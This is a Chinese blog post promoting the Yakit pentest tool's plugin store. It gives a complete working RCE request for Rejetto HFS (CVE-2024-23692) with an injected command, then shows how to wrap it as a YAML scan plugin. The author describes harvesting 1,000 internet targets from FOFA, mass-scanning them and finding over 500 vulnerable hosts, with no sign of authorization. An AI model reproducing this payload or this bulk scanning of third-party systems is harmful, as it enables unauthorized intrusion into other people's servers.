写在前面
你是否希望能有一个工具可以只需要输入或者导入目标即可检测某一个oa或者某一个系统的漏洞?上网一查,好像大家都在售卖这种GUI?👇
工具乍一看,哇好牛逼,输入或者导入目标就可以检测例如海康威视综合安防管理平台这种系统的历史漏洞,细一看,我操要钱!
而现在,你不需要再去交智商税了!
首先我们要清楚一件事,这些工具里面的漏洞,是什么未公开的0day吗?并不是,它只是一堆1/nday而已,poc网上都有,只是简单的用javafx这个gui框架写出来而已,那么有没有一种工具可以让我们只需要有poc,不用我们动手写代码,就可以批量扫描呢?
答案是肯定的,这就是我们今天要介绍的工具:Yakit
安装与其他使用yakit的方法这里不再赘述,有需要请转到:国货之光Yakit,一站式轻松搞定渗透测试,查看公众号文章及项目文档,本文主要介绍yakit的插件商店。
进入yakit的项目后,点击左上方的“插件”->“插件商店”,你就可以看见yakit现存的插件了。
功能众多,信息收集类的插件:
加解密的插件:
还有最近更新的AI插件等.....
还有我们今天要说的yaml插件
正文开始
那么如何在yakit中创建yaml用于扫描呢,以Rejetto HTTP文件服务器 未授权RCE(CVE-2024-23692)为例,poc如下:
GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
直接将这整段poc数据包扔进yakit的webfuzzer中,如果你知道存在漏洞的目标的返回结果,则点击webfuzzer配置栏的左侧规则按钮,设置一下判断存在漏洞的条件,在此poc中,如果目标存在漏洞,则返回包中一定会包含“IP”字符。
所以我们点点点,把规则配置好并保存,如果你不知道你的poc正确返回结果,可以忽略此步骤,无此步骤只是无法上传插件商店,可以本地自用。
回到webfuzzer,点击右上角“生成yaml模板”,选择合适的模板,生成后编辑yaml中的信息,存为插件即可:
大家也看出来了,这其实就只是nuclei的模板格式,和burp的nessus插件差不多,都可以便携的生成yaml,yakit额外的集成了扫描,我们来看看效果。
从fofa扒了1k条可能存在漏洞的目标,导入yakit中,勾选我们刚刚做好的插件,设置好并发线程,直接开始执行!梭哈!
一千个目标很快扫描完了,检测出了500多个存在漏洞的目标,同时支持导出为excel,至此,一次完整的批量扫描就完成了,如果你需要对同一或多个目标批量扫描多个poc,就勾选多个插件就行
又有师傅问了,你这只是简单的判断,那复杂的怎么办呢?比如需要多步验证的poc,要先获取到必要的参数,比如token或者cookie才能打后面的poc,你这是不是没有用啦?
不用担心,在之前提到的规则按钮下方,还有一个“序列”按钮。
这里的作用就是把不同的fuzzer分步骤集合在一起,再通过数据提取器(支持正则),以及变量等功能,灵活组成你需要的多步骤的poc,具体操作这里不再教学,留给各位师傅自行研究,yakit还有许许多多好用的功能,强烈建议多多使用。
相信看完这篇文章的你,已经不再需要再去买各种付费的GUI啦,快去打开yakit,上传写着你ID的插件吧!